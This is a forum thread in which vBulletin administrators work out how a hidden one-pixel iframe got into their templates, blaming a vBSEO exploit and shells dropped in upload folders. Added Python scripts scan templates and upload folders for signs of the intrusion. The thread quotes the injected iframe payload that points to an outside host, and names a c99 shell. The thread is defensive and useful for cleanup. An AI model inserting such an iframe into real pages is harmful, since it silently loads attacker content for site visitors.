Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

  • Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

    Hey, for some days I have been facing an iframe problem. I changed my database password and disabled all plugins (define('DISABLE_HOOKS', true);), but someone is still putting an iframe on my forums; sometimes I find this code in the header and sometimes in the footer.
    Code:
    <iframe width=1 height=1 border=0 frameborder=0 src=\\"http://centiyo.com/in.cgi?default\\"></iframe>
    I also upgraded the forum to vBulletin 3.8.4 Patch Level 1. I searched on Google and some other people are also getting this problem. So please guide me on what I need to do.

    Thanks

  • #2
    What about your FTP and Control Panel passwords?

    Are you on shared hosting or dedicated server?

    Are you using the default style or have you got a customised style?
    Vote for:

    - *Admin Settable Paid Subscription Reminder Timeframe*
    - *PM - Add ability to reply to originator only*
    - Add Admin ability to auto-subscribe users to specific channel(s)
    - Highlight the correct navigation tab when you are on a custom page
    - "Quick Route" Interface...
    - Allow to use custom icons for individual forums

    Comment


    • #3
      I have a dedicated server. I also changed the account user name and password. And I am using vb3bluesaint from vBulletinStyles.
      Originally posted by Trevster View Post
      What about your FTP and Control Panel passwords?

      Are you on shared hosting or dedicated server?

      Are you using the default style or have you got a customised style?

      Comment


      • #4
        If these are continually appearing in your templates then check your server logs to see if there's anything there. It may be that a script is actually installed on the server to periodically inject this code into your database, so also check with your host and see if there's anything that can be done from their end to search for this.

        Another option that may be worth considering is creating a new style from the XML file again and setting that as the default. Then, bin all the others. Users won't notice the difference in the style name as it will look exactly the same anyway.

        Comment


        • #5
          Facing the same problem myself this morning

          It's definitely a SQL Injection. How is the ultimate question.

          Comment


          • #6
            Hey, I have the same problem,
            but in my case I had this iframe in showthread.php too.
            It's strange because via "SQL Injection" it's impossible to change file content, am I right?

            P.S. I had the iframe in the "header" template.
            My admin checked the Apache logs and there wasn't a "centiyo" phrase,
            so it must be SQL Injection in POST
            Last edited by moshu; Thu 3 Dec '09, 8:39am.
            my counter strike forum :)
            and best cs portal :D

            Comment


            • #7
              I am also having this problem today. So far I have reuploaded the files, set the template to default, and changed the MySQL password, but I am still getting this problem.

              I am searching posts and templates for any changes as we speak.
              Bluepearl Skins - vBulletin 4 & 5 Skins

              Comment


              • #8
                LADIES AND GENTLEMEN:

                IF YOU ARE HAVING VBSEO PLEASE UPDATE NOW!!
                An exploit has been released for it and a lot of forums are getting struck.

                Comment


                • #9
                  My Musclesci vbseo has expired. Will updating to 3.2.0 fix this problem?
                  Bluepearl Skins - vBulletin 4 & 5 Skins

                  Comment


                  • #10
                    I can confirm updating to the latest VBSEO (for me 3.2.0) fixed this problem

                    Also search all your templates for '<iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe>' and delete it.

                    I found this only in the header and footer templates.
                    Last edited by Sean James; Thu 3 Dec '09, 1:28pm.
                    Bluepearl Skins - vBulletin 4 & 5 Skins

                    Comment
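Added example, not part of the thread: a Python check for the template search suggested in post #10. It flags any iframe whose width and height are both 1 pixel or less, so it catches both the backslash-escaped form from the first post and the plain form quoted in post #10. The `find_hidden_iframes` helper and the sample templates are constructed for illustration; how the template text is exported from the database is left to the reader.

```python
import re

# Opening <iframe ...> tag; group 1 is the raw attribute text.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value where the value is bare, quoted, or quoted with backslash-escaped
# quotes (the stored form shown in the first post).
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:\\*["']([^"'\\]*)\\*["']|([^\s"'>]+))""")

def parse_attrs(attr_text):
    """Return a dict of lower-cased attribute names to values."""
    attrs = {}
    for name, quoted, bare in ATTR_RE.findall(attr_text):
        attrs[name.lower()] = quoted if quoted else bare
    return attrs

def is_tiny(value):
    """True when a width/height value is 0 or 1 (optionally with a px suffix)."""
    m = re.fullmatch(r"(\d+)(?:px)?", (value or "").strip().lower())
    return bool(m) and int(m.group(1)) <= 1

def find_hidden_iframes(templates):
    """templates: dict of template title -> text. Returns [(title, src), ...]."""
    hits = []
    for title, text in templates.items():
        for m in IFRAME_RE.finditer(text):
            attrs = parse_attrs(m.group(1))
            if is_tiny(attrs.get("width")) and is_tiny(attrs.get("height")):
                hits.append((title, attrs.get("src", "")))
    return hits

# Constructed sample data: two infected templates and one legitimate embed.
SAMPLE_TEMPLATES = {
    "header": r'<div id="top"></div><iframe width=1 height=1 border=0 '
              r'frameborder=0 src=\\"http://centiyo.com/in.cgi?default\\"></iframe>',
    "footer": '<iframe width=1 height=1 border=0 frameborder=0 '
              'src="http://centiyo.com/in.cgi?default"></iframe>',
    "FORUMHOME": '<iframe width="560" height="315" '
                 'src="https://video.example/embed/1"></iframe>',
}

if __name__ == "__main__":
    for title, src in find_hidden_iframes(SAMPLE_TEMPLATES):
        print(f"{title}: hidden iframe -> {src}")
```

Matching on the iframe's size rather than on the domain means the check still fires if the injected URL changes.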


                    • #11
                      Hehe, I knew it... upgrade to 3.2.2 of vbseo

                      Comment


                      • #12
                        Hey, today I upgraded VBSEO to 3.3.2 and changed the database password again. Let's see.

                        Comment


                        • #13
                          jamshed, scan all your customvatar, attachment, customprofilepics folder for any file with other extension than
                          .jpg|.gif|.attach|.jpeg.

                          they might have put a c99 shell on your server and can access it even if you fixed the vbseo vuln.

                          Comment


                          • #14
                            What do your server logs show?
                            It shouldn't be that hard to track down how the attacker is getting in
                            -- Web Developer for hire
                            ---Online Marketing Tools and Articles

                            Comment


                            • #15
                              Originally posted by kateido View Post
                              jamshed, scan all your customvatar, attachment, customprofilepics folder for any file with other extension than
                              .jpg|.gif|.attach|.jpeg.

                              they might have put a c99 shell on your server and can access it even if you fixed the vbseo vuln.

                              Found files in attachments called zaco.php and doit_js.php.
                              Removed.

                              Thanks kateido

                              Comment
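Added example, not part of the thread: a Python sweep of the upload folders along the lines of posts #13 and #15. It reports files whose extension is outside the list kateido gave, and goes one step further by flagging allowed-extension files that contain a PHP opening tag. The `scan_uploads` helper, the `<?php` marker check and the sample tree are assumptions made for illustration.

```python
import os
import tempfile

ALLOWED_EXT = {".jpg", ".gif", ".attach", ".jpeg"}  # extension list from post #13
SCRIPT_MARKER = b"<?php"                            # assumption: simple content check

def scan_uploads(roots, sniff_bytes=4096):
    """Walk upload folders and return sorted (path, reason) findings."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                ext = os.path.splitext(name)[1].lower()
                if ext not in ALLOWED_EXT:
                    findings.append((path, "unexpected extension"))
                    continue
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(sniff_bytes).lower()
                except OSError as exc:
                    findings.append((path, f"unreadable: {exc.strerror}"))
                    continue
                if SCRIPT_MARKER in head:
                    findings.append((path, "script content in upload"))
    return sorted(findings)

def demo():
    """Build a constructed sample tree in a temp dir and scan it."""
    sample = {
        "attachments/1/101.attach": b"\xff\xd8\xff\xe0 constructed image bytes",
        "attachments/zaco.php": b"<?php /* placeholder */ ?>",
        "customavatars/avatar5_1.gif": b"GIF89a <?php /* placeholder */ ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in sample.items():
            path = os.path.join(tmp, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return [(os.path.relpath(p, tmp).replace(os.sep, "/"), why)
                for p, why in scan_uploads([tmp])]

if __name__ == "__main__":
    for rel, why in demo():
        print(f"{why}: {rel}")
```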
